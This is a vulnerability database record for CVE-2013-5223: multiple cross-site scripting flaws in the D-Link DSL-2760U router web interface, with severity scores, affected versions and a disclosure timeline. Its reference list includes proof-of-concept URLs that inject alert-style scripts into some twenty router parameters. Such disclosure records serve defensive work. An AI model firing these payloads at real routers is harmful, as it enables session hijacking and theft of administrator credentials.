Sign-up

ID

VAR-201311-0288


CVE

CVE-2013-5223


TITLE

D-Link DSL-2760U Gateway cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2013-005171

DESCRIPTION

D-Link DSL-2760U The gateway contains a cross-site scripting vulnerability.By the remotely authenticated user via the following parameters Web Script or HTML May be inserted. (1) sntpcfg.cgi of ntpServer1 Parameters (2) ddnsmngr.cmd of username Parameters (3) todmngr.tod of username Parameters (4) urlfilter.cmd of TodUrlAdd Parameters (5) scprttrg.cmd of appName Parameters (6) scoutflt.cmd of add In action fltName Parameters (7) scoutflt.cmd of remove In action rmLst Parameters (8) portmapcfg.cmd of groupName Parameters (9) snmpconfig.cgi of snmpRoCommunity Parameters (10) scinflt.cmd of fltName Parameters (11) prmngr.cmd of add In action PolicyName Parameters (12) prmngr.cmd of remove In action rmLst Parameters (13) ippcfg.cmd of ippName Parameters (14) samba.cgi of smbNetBiosName Parameters (15) samba.cgi of smbDirName Parameters (16) wlcfg.wl of wlSsid Parameters. The D-Link Router 2760N is a router device. There are multiple cross-site scripting and HTML injection vulnerabilities in the D-Link DSL-2760U-BN. Since the D-Link Router 2760N is handling NTS settings, dynamic DNS settings, URL filtering. NAT port processing, IP filtering, interface group, import IP filter, policy routing add, print server, SAMBA configuration, WIFI SSID incorrectly filter input, allowing remote attackers to exploit vulnerabilities for cross-site scripting attacks when malicious data is viewed When it can lead to sensitive information leakage or session hijacking. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. E1). The vulnerability is caused by (1) the sntpcfg.cgi script does not filter the 'ntpServer1' parameter correctly (2) the ddnsmngr.cmd or todmngr.tod script does not correctly Filter the 'username' parameter (3) The urlfilter.cmd script does not correctly filter the 'TodUrlAdd' parameter (4) The scprttrg.cmd script does not correctly filter the 'appName' parameter (5) The scoutflt.cmd script does not correctly filter the 'fltName' in the add operation 'rmLst' parameter in parameters and delete operations (6) portmapcfg.cmd script does not filter 'groupName' parameter correctly (7) snmpconfig.cgi script does not filter 'snmpRoCommunity' parameter correctly (8) scinflt.cmd script does not filter 'fltName' correctly 'Parameter (9) The prmngr.cmd script does not correctly filter the 'PolicyName' parameter in the add operation and the 'rmLst' parameter in the delete operation (10) The ippcfg.cmd script does not correctly filter the 'ippName' parameter (11) The samba.cgi script The 'smbNetBiosName' and 'smbDirName' parameters are not filtered correctly (12) The wlcfg.wl script does not filter the 'wlSsid' parameter correctly. A remote attacker could exploit this vulnerability to inject arbitrary web script or HTML by using a specially crafted URL. Advisory: D-Link Router 2760N (DSL-2760U-BN) Multiple XSS Author: Liad Mizrachi Vendor URL: http://www.dlink.com Status: Fixed CVE-ID: CVE-2013-5223 ========================== Vulnerability Description ========================== Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link Router 2760N, both stored and reflected in various sections of the router Web-UI. 23-Aug-2013 - Vendor Re-Informed - No response. 01-Sep-2013 - Vendor Re-Informed - No response. 10-Sep-2013 - Vendor Re-Informed - No response. 10-Oct-2013 - Vendor Re-Informed - No response. ========================== References ========================== http://www.dlink.com http://www.dlink.com.tr/en/arts/117.html http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf

Trust: 1.71

sources: JVNDB: JVNDB-2013-005171 // CNVD: CNVD-2013-14456 // BID: 63648 // VULHUB: VHN-65225 // PACKETSTORM: 123976

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-14456

AFFECTED PRODUCTS

vendor:dlinkmodel:dsl-2760uscope:ltversion:1.12

Trust: 1.0

vendor:d linkmodel:dsl-2760uscope:eqversion:(rev. e1)

Trust: 0.8

vendor:d linkmodel:dsl-2760u-bnscope: - version: -

Trust: 0.6

vendor:dlinkmodel:dsl-2760uscope:eqversion: -

Trust: 0.6

vendor:d linkmodel:dsl-2760u-bnscope:eqversion:0

Trust: 0.3

sources: CNVD: CNVD-2013-14456 // BID: 63648 // JVNDB: JVNDB-2013-005171 // CNNVD: CNNVD-201311-140 // NVD: CVE-2013-5223

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-5223
value: MEDIUM

Trust: 1.0

NVD: CVE-2013-5223
value: LOW

Trust: 0.8

CNVD: CNVD-2013-14456
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201311-140
value: LOW

Trust: 0.6

VULHUB: VHN-65225
value: LOW

Trust: 0.1

VULMON: CVE-2013-5223
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2013-5223
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2013-14456
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-65225
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2013-5223
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.1

Trust: 1.0

sources: CNVD: CNVD-2013-14456 // VULHUB: VHN-65225 // VULMON: CVE-2013-5223 // JVNDB: JVNDB-2013-005171 // CNNVD: CNNVD-201311-140 // NVD: CVE-2013-5223

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-65225 // JVNDB: JVNDB-2013-005171 // NVD: CVE-2013-5223

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201311-140

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 123976 // CNNVD: CNNVD-201311-140

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2013-005171

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-65225 // 
            
            
            
            VULMON: CVE-2013-5223

PATCH
title:SAP10002url:http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10002
Trust: 0.8
title:Known Exploited Vulnerabilities Detectorurl:https://github.com/Ostorlab/KEV 
Trust: 0.1
sources:
            
            
            VULMON: CVE-2013-5223 // 
            
            
            
            JVNDB: JVNDB-2013-005171

EXTERNAL IDS
db:NVDid:CVE-2013-5223
Trust: 3.6
db:PACKETSTORMid:123976
Trust: 1.9
db:OSVDBid:99606
Trust: 1.8
db:OSVDBid:99610
Trust: 1.8
db:OSVDBid:99608
Trust: 1.8
db:OSVDBid:99607
Trust: 1.8
db:OSVDBid:99615
Trust: 1.8
db:OSVDBid:99612
Trust: 1.8
db:OSVDBid:99613
Trust: 1.8
db:OSVDBid:99603
Trust: 1.8
db:OSVDBid:99605
Trust: 1.8
db:OSVDBid:99604
Trust: 1.8
db:OSVDBid:99611
Trust: 1.8
db:OSVDBid:99616
Trust: 1.8
db:OSVDBid:99609
Trust: 1.8
db:DLINKid:SAP10002
Trust: 1.8
db:BIDid:63648
Trust: 1.7
db:JVNDBid:JVNDB-2013-005171
Trust: 0.8
db:CNNVDid:CNNVD-201311-140
Trust: 0.7
db:CNVDid:CNVD-2013-14456
Trust: 0.6
db:XFid:20135223
Trust: 0.6
db:XFid:88723
Trust: 0.6
db:XFid:88724
Trust: 0.6
db:FULLDISCid:20131110 D-LINK ROUTER 2760N (DSL-2760U-BN) MULTIPLE XSS
Trust: 0.6
db:EXPLOIT-DBid:36987
Trust: 0.2
db:EXPLOIT-DBid:36988
Trust: 0.1
db:VULHUBid:VHN-65225
Trust: 0.1
db:VULMONid:CVE-2013-5223
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2013-14456 // 
            
            
            
            VULHUB: VHN-65225 // 
            
            
            
            VULMON: CVE-2013-5223 // 
            
            
            
            BID: 63648 // 
            
            
            
            JVNDB: JVNDB-2013-005171 // 
            
            
            
            PACKETSTORM: 123976 // 
            
            
            
            CNNVD: CNNVD-201311-140 // 
            
            
            
            NVD: CVE-2013-5223

REFERENCES
url:http://seclists.org/fulldisclosure/2013/nov/76
Trust: 2.7
url:http://securityadvisories.dlink.com/security/publication.aspx?name=sap10002
Trust: 1.8
url:http://packetstormsecurity.com/files/123976
Trust: 1.8
url:http://osvdb.org/99603
Trust: 1.8
url:http://osvdb.org/99604
Trust: 1.8
url:http://osvdb.org/99605
Trust: 1.8
url:http://osvdb.org/99606
Trust: 1.8
url:http://osvdb.org/99607
Trust: 1.8
url:http://osvdb.org/99608
Trust: 1.8
url:http://osvdb.org/99609
Trust: 1.8
url:http://osvdb.org/99610
Trust: 1.8
url:http://osvdb.org/99611
Trust: 1.8
url:http://osvdb.org/99612
Trust: 1.8
url:http://osvdb.org/99613
Trust: 1.8
url:http://osvdb.org/99615
Trust: 1.8
url:http://osvdb.org/99616
Trust: 1.8
url:https://exchange.xforce.ibmcloud.com/vulnerabilities/88724
Trust: 1.2
url:https://exchange.xforce.ibmcloud.com/vulnerabilities/88723
Trust: 1.2
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5223
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5223
Trust: 0.8
url:http://www.securityfocus.com/bid/63648
Trust: 0.7
url:http://xforce.iss.net/xforce/xfdb/88724
Trust: 0.6
url:http://xforce.iss.net/xforce/xfdb/88723
Trust: 0.6
url:http://www.dlink.com.tr/en/arts/117.html
Trust: 0.4
url:https://cwe.mitre.org/data/definitions/79.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://www.exploit-db.com/exploits/36987/
Trust: 0.1
url:https://github.com/ostorlab/kev
Trust: 0.1
url:http://<d_link_host>/ippcfg.cmd?action=savapply&ippenabled=1&ippmake=aa&ippname=aa";alert('xss-printer-sever');//
Trust: 0.1
url:http://<d_link_host>/scinflt.cmd?action=add&wanif=ppp0&fltname=<script>alert('xss&protocol=2&srcaddr=ss')</script>&srcmask=255.255.255.0&srcport=80&dstaddr=10.0.0.10&dstmask=255.255.255.0&dstport=8080
Trust: 0.1
url:http://<d_link_host>/wlcfg.wl?wlssididx=0&wlenbl=1&wlhide=0&wlapisolation=0&wlssid=%3cscript%3ealert(%27xssid%27)%3c/script%3e&wlcountry=il&wlmaxassoc=16&wldisablewme=0&wlenablewmf=0&wlenbl_wl0v1=0&wlssid_wl0v1=wl0_guest1&wlhide_wl0v1=0&wlapisolation_wl0v1=0&wldisablewme_wl0v1=0&wlenablewmf_wl0v1=0&wlmaxassoc_wl0v1=16&wlenbl_wl0v2=0&wlssid_wl0v2=wl0_guest2&wlhide_wl0v2=0&wlapisolation_wl0v2=0&wldisablewme_wl0v2=0&wlenablewmf_wl0v2=0&wlmaxassoc_wl0v2=16&wlenbl_wl0v3=0&wlssid_wl0v3=wl0_guest3&wlhide_wl0v3=0&wlapisolation_wl0v3=0&wldisablewme_wl0v3=0&wlenablewmf_wl0v3=0&wlmaxassoc_wl0v3=16
Trust: 0.1
url:http://<d_link_host>/prmngr.cmd?action=add&policyname=<script>alert('x&sourceip=ss');</script>&lanifcname=wl0&wanif=ppp0&defaultgw=10.0.0.111
Trust: 0.1
url:http://<d_link_host>/samba.cgi?enablesmb=1&smbnetbiosname=';var
Trust: 0.1
url:http://<d_link_host>/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0
Trust: 0.1
url:http://<d_link_host>/urlfilter.cmd?action=set_url&todurladd=%3cscript%3ealert(%27xss%27)%3c/script%3e&port_num=80
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2013-5223
Trust: 0.1
url:http://www.dlink.com
Trust: 0.1
url:http://<d_link_host>/scoutflt.cmd?action=add&fltname=<script>alert('xss')</script>&protocol=1&srcaddr=10.0.0.10&srcmask=255.255.255.0&srcport=80&dstaddr=10.0.0.12&dstmask=255.255.255.0&dstport=8080
Trust: 0.1
url:http://<d_link_host>/scoutflt.cmd?action=remove&rmlst=%3cscript%3ealert%28%27xss%27%29%3c/script%3e
Trust: 0.1
url:http://www.netcheif.com/downloads/dsl-2760u_user_manual.pdf
Trust: 0.1
url:http://<d_link_host>/samba.cgi?enablesmb=1&smbnetbiosname=';alert("samba-x&smbdirname=ss");//&smbutf8dirname=bbb&smbcharset=utf8&smbunplug=nolug=no
Trust: 0.1
url:http://<d_link_host>/wlsecurity.html]
Trust: 0.1
url:http://<d_link_host>/scprttrg.cmd?action=add&appname=%3cscript%3ealert(%27xss%27)%3c/script%3e&dstwanif=ppp0&tstart=1111,&tend=1112,&tproto=1,&ostart=11,&oend=11,&oproto=1,
Trust: 0.1
url:http://<d_link_host>/todmngr.tod?action=add&username=%3cscript%3ealert%28%27xss%27%29%3c/script%3e&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732
Trust: 0.1
url:http://<d_link_host>/snmpconfig.cgi?snmpstatus=1&snmprocommunity=%27;alert(%27xss%27)&snmprwcommunity=private&snmpsysname=d-link&snmpsyscontact=unknown&snmpsyslocation=unknown&snmptrapip=0.0.0.0
Trust: 0.1
url:http://<d_link_host>/prmngr.cmd?action=remove&rmlst=%3cscript%3ealert%28%27xss%27%29%3c/script%3e
Trust: 0.1
url:http://<d_link_host>/portmapcfg.cmd?action=add&groupname=<script>alert('xss')</script>&choicebox=|usb0|wl0|&wanifname=atm1
Trust: 0.1
url:http://<d_link_host>/wlmacflt.cmd?action=view]
Trust: 0.1
url:http://<d_link_host>/sntpcfg.cgi?ntp_enabled=1&ntpserver1=locahost%22;alert%28%27xss%27%29;//&ntpserver2=time-nw.nist.gov&ntpserver3=&ntpserver4=&ntpserver5=&timezone_offset=+02:00&timezone=jerusalem&use_dst=0
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2013-14456 // 
            
            
            
            VULHUB: VHN-65225 // 
            
            
            
            VULMON: CVE-2013-5223 // 
            
            
            
            BID: 63648 // 
            
            
            
            JVNDB: JVNDB-2013-005171 // 
            
            
            
            PACKETSTORM: 123976 // 
            
            
            
            CNNVD: CNNVD-201311-140 // 
            
            
            
            NVD: CVE-2013-5223

CREDITS
Liad Mizrachi
Trust: 1.0
sources:
            
            
            BID: 63648 // 
            
            
            
            PACKETSTORM: 123976 // 
            
            
            
            CNNVD: CNNVD-201311-140

SOURCES
db:CNVDid:CNVD-2013-14456
db:VULHUBid:VHN-65225
db:VULMONid:CVE-2013-5223
db:BIDid:63648
db:JVNDBid:JVNDB-2013-005171
db:PACKETSTORMid:123976
db:CNNVDid:CNNVD-201311-140
db:NVDid:CVE-2013-5223

LAST UPDATE DATE
2024-12-20T22:29:55.964000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2013-14456date:2013-11-14T00:00:00
db:VULHUBid:VHN-65225date:2017-08-29T00:00:00
db:VULMONid:CVE-2013-5223date:2017-08-29T00:00:00
db:BIDid:63648date:2013-11-10T00:00:00
db:JVNDBid:JVNDB-2013-005171date:2013-11-20T00:00:00
db:CNNVDid:CNNVD-201311-140date:2013-11-20T00:00:00
db:NVDid:CVE-2013-5223date:2024-12-20T03:55:33.757

SOURCES RELEASE DATE
db:CNVDid:CNVD-2013-14456date:2013-11-14T00:00:00
db:VULHUBid:VHN-65225date:2013-11-19T00:00:00
db:VULMONid:CVE-2013-5223date:2013-11-19T00:00:00
db:BIDid:63648date:2013-11-10T00:00:00
db:JVNDBid:JVNDB-2013-005171date:2013-11-20T00:00:00
db:PACKETSTORMid:123976date:2013-11-11T23:46:32
db:CNNVDid:CNNVD-201311-140date:2013-11-12T00:00:00
db:NVDid:CVE-2013-5223date:2013-11-19T04:50:12.063